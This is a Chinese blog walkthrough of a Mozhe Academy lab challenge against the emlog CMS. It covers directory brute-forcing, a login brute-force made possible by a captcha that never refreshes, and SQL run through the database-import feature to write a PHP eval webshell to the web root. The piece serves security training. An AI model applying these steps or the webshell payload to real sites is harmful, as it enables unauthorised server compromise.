美文网首页
墨者学院-CMS系统漏洞分析溯源(第6题)

墨者学院-CMS系统漏洞分析溯源(第6题)

作者: nohands_noob | 来源:发表于2019-07-11 20:32 被阅读0次

    靶场地址:
    https://www.mozhe.cn/bug/detail/Yy9vUVVqcWNmWEpKdFh4dTFheHVZdz09bW96aGUmozhe

    emlog 是 "Every Memory Log" 的简称,意即:点滴记忆。它是一款基于PHP语言和MySQL数据库的开源、免费、功能强大的个人或多人联合撰写的博客系统(blog)。基于PHP和MySQL的功能强大的博客及CMS建站系统。致力于提供快速、稳定,且在使用上又极其简单、舒适的博客服务。安装和使用都非常方便。目前 emlog 正在受到越来越多的广大用户的青睐。

    emlog5.3.1和6.0测试版本均存在暴力破解漏洞,在登录错误的情况下,验证码并没有被刷新,因此验证码如同虚设

    1.使用DirBuster暴力破解web目录,找到后台
    如图/servlets为后台目录



    2.用户名输入mozhe777,密码随意输入,输入正确的验证码,BurpSuite开启拦截,导入字典,这里使用的是弱密码top1000,百度就能搜到,爆破出口令为qwer1234


    3.成功登录后台后利用备份/导入数据库写入一句话木马,备份数据库,下拉框选择emlog_blog:


    在导出的数据库文件中添加数据库语句,内容为:

    Drop TABLE IF EXISTS emlog_shell;
    Create Table emlog_shell(`cmd` longtext NOT NULL);
    Insert INTO emlog_shell VALUES('<?php @eval($_POST[cmd]);?>');
    Select cmd from emlog_shell into outfile '/var/www/html/cmd.php';
    Drop TABLE IF EXISTS emlog_shell;
    

    将其导入,一句话写入完成,使用菜刀连接即可

    相关文章

      网友评论

          本文标题:墨者学院-CMS系统漏洞分析溯源(第6题)

          本文链接:https://www.haomeiwen.com/subject/utjjkctx.html